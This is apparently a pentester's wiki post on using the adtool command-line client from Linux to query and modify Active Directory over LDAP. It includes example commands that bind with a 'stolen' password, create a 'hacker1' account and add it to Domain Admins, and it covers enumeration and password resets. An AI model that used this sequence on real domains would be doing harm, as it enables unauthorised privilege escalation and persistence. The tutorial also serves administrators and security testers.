Linux LDAP Tricks ADTOOL - evilmog/evilmog GitHub Wiki

We've all had to do it at one point, he've had to do active directory stuff from linux such as Ubuntu with PTF, Kali. We could write tool in python or ruby, or do something evil in perl but sometimes we need a good old fashioned ldap client that just works from the command line.

So I was running my mouth off on twitter yesterday after I saw a post about @mubix running a password reset on windows from the linux CLI, I bragged how I'd done this for years and then I realized I hadn't done a blog post after I was called out on it. As they say in the industry PoC or GTFO. This is my writeup.

To start off with we have a number of options but for this I am going to use adtool which is easy to install. Now there are a couple of requirements on the AD side, first the target domain must have LDAPS enabled in order for password resets to work, and second you must have the public cert of the CA used to sign the Domain Controller cert or be willing to ignore cert signing. Ignoring cert signing is bad but do as I say and not as I do. Also standard disclaimer do not write an IDM in bash, I've done it, it's evil, and it's likely a security nightmare if somebody injects raw code into it.

To Install run the following

tar zxvf adtools-1.x.tar.gz
cd adtools-1.x
./configure
make
make install

Now we will need some information to connect, namely an ldap user to connect with and their binddn, the uri of the active directory server to connect to, the ldap users ad password, and the ldap search base.

For example, let's say we are connecting to ad1.contoso.com our ldap uri would be ldaps://ad1.contoso.com:636 and if we were going over ldap we could do ldap://ad1.contoso.com and in theory we could also connect readonly to a global catalog server on the appropriate port.

For the user account this is where things get fun, in some domains the Distinguished Name or DN may not match the samaccountname. A script to find the DN for a current user in windows can be found here but basically the format looks like this cn=evilmog,ou=Users,dc=contoso,dc=com

The bind password is self explanatory, this is the active directory password of your bind user.

The searchbase is where in the tree you are looking, I usually start at the domain root, this isn't optimal for speed but handy as a pentester. If I'm cn=evilmog,ou=Users,dc=contoso,dc=com then my searchbase is dc=contoso,dc=com, if I have a domain like subdomain.contoso.com my searchbase would be dc=subdomain,dc=contoso,dc=com (of course I'd need to edit the ldap uri etc, everything should match up)

Now all of these can be passed in the commandline to adtool such as this

adtool -H 'ldaps://ad1.contoso.com:636' -D 'cn=evilmog,ou=Users,dc=contoso,dc=com' -w 'mystolenpassword123!' -b 'dc=contoso,dc=com'

If you are doing enough this gets annoying so make a ~/.adtool.cfg with the following contents of course changing your values

uri ldaps://ad1.contoso.com:636
binddn cn=evilmog,ou=Users,dc=contoso,dc=com
bindpw mystolenpassword123!
searchbase dc=contoso,dc=com

So now that this is all setup what do you do with it, well almost anything really, it's just best if you know a bit about ldap as this is a fairly dumb client but it works, its also a great testing tool if you are making your own ldap tools.

Say we want to make a new domain administrator user (this should totally tip off the SOC or cause a SIEM alert)

adtool usercreate hacker1 ou=Users,dc=contoso,dc=com
adtool setpass hacker1 Somecompliantpassword123!
adtool userunlock hacker1 (I think this calls a replace of useraccountcontrol)
adtool attributereplace hacker1 useraccountcontrol 512
adtool groupadduser "Domain Admins" hacker1

If you are looking to do some enumeration like find out group memberships of a user run this (note you will need to use the DN prior to the comma, it sometimes works on samaccountname though)

adtool attributeget hacker1 memberof

To find out memberships of a group

adtool attributeget "Domain Admins" member

To disable a user

adtool attributereplace hacker1 useraccountcontrol 514

To reset account lockout

adtool attributereplace hacker1 lockouttime 0

To find a users DN

adtool search samaccountname hacker1

A handy guide to useraccountcontrol attributes is here Basically useraccountcontrol is a binary representation of various flags and its handy to decode the attribute. A quick one liner is

echo "obase=2;$useraccountcontrol" | bc

In this case we could use 512 or 514, 512 being a normal user account and 514 being a disabled user. If you get good with bash you can call out specific fields.

Google is your friend, some attributes in AD are read only, not all search filters work and you may need to get evil but this tool will get the job done.